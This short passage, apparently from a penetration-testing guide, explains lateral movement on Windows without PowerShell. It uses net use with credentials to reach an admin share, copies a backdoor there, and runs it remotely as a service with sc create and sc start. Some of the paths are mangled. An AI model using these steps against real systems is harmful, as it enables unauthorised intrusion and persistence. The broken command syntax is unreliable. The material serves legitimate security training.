What if penetration testers encounter a system with no PowerShell to invoke? During such cases, SC will be very handy for performing lateral movement in the network for all of the systems that you have access to or systems with anonymous access to the shared folder:
- * net use \advancedc$/user:advancedusername password
- dir \advancedc$
- Copy the backdoor that's been created to the shared folder
- Create a service called backtome
- * Sc \remotehost create backtome binpath="c:xxmalware.exe"
- Sc remotehost start backtome